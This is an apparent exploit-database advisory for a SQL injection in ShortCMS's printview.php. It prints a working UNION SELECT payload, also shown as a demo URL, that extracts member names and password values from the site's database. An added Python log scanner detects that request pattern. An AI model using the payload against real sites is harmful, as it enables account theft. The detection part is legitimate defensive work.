
ShortCMS 1.11F(B) (con) - SQL Injection

Author: Gamoscu
type: webapps
platform: php
date_added: 2010-02-23 
verified: 0 

ShortCMS v. 1.11F(B) (con) SQL Injection Vulnerability

###########################

Author    : Gamoscu
Homepage  : http://www.1923turk.com
Blog      : http://gamoscu.wordpress.com/
Script    : ShortCMS
Download  : http://www.shortcms.de/index.php?dwnldct

###########################

[ Vulnerable File ]

printview.php?func=con&pvid= [ SQL ]


[ XpL ]

-1/**/union/**/all/**/select/**/1,2,concat(member_nick,0x3a,member_pass),4,5,6,7,8,9,10,11,12,13,14,15+from+shc_memberlist--


[ Demo ]


http://server/kde/printview.php?func=con&pvid=-1/**/union/**/all/**/select/**/1,2,concat(member_nick,0x3a,member_pass),4,5,6,7,8,9,10,11,12,13,14,15+from+shc_memberlist--
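
A defender-side check for the request pattern shown above, added here as an example and not part of the original advisory: it scans web access logs for printview.php requests whose pvid value is not a plain integer, after URL-decoding and stripping /**/ comments. The log lines are constructed, and treating pvid as a numeric id is an assumption based on the -1 at the start of the payload.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines; addresses, times and sizes are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [23/Feb/2010:10:00:01 +0000] "GET /kde/printview.php?func=con&pvid=12 HTTP/1.1" 200 5120
203.0.113.9 - - [23/Feb/2010:10:00:07 +0000] "GET /kde/printview.php?func=con&pvid=-1/**/union/**/all/**/select/**/1,2,concat(member_nick,0x3a,member_pass),4+from+shc_memberlist-- HTTP/1.1" 200 734
203.0.113.9 - - [23/Feb/2010:10:00:09 +0000] "GET /kde/printview.php?func=con&pvid=-1%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F1 HTTP/1.1" 200 700
203.0.113.7 - - [23/Feb/2010:10:00:11 +0000] "GET /kde/index.php?page=union+select+news HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')
UNION_RE = re.compile(r"\bunion\b(?:\s+all\b)?\s+select\b")

def normalize(value):
    """Lowercase, turn /* */ comments into spaces, collapse whitespace."""
    value = re.sub(r"/\*.*?\*/", " ", value.lower(), flags=re.S)
    return re.sub(r"\s+", " ", value).strip()

def inspect_line(line):
    """Return (client, verdict, pvid) for a printview.php request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/printview.php"):
        return None
    values = parse_qs(url.query, keep_blank_values=True).get("pvid")
    if not values:
        return None
    verdict, shown = "ok", values[0]
    for raw in values:  # parse_qs has already URL-decoded each value
        if UNION_RE.search(normalize(raw)):
            return line.split()[0], "union-select", raw
        if not re.fullmatch(r"[0-9]+", raw):  # assumed: pvid is a numeric id
            verdict, shown = "non-numeric", raw
    return line.split()[0], verdict, shown

def scan(log_text):
    """Return findings for printview.php requests whose pvid is not a plain integer."""
    results = (inspect_line(l) for l in log_text.splitlines())
    return [r for r in results if r and r[1] != "ok"]

if __name__ == "__main__":
    for client, verdict, pvid in scan(SAMPLE_LOG):
        print(f"{client}  {verdict:12}  pvid={pvid!r}")
```

The same integer-only rule, applied in the application before the value reaches the query, is what closes the hole; the log check only shows who has been probing it.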


##############################################################
# Greetz: Manas58 - Baybora - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO
##############################################################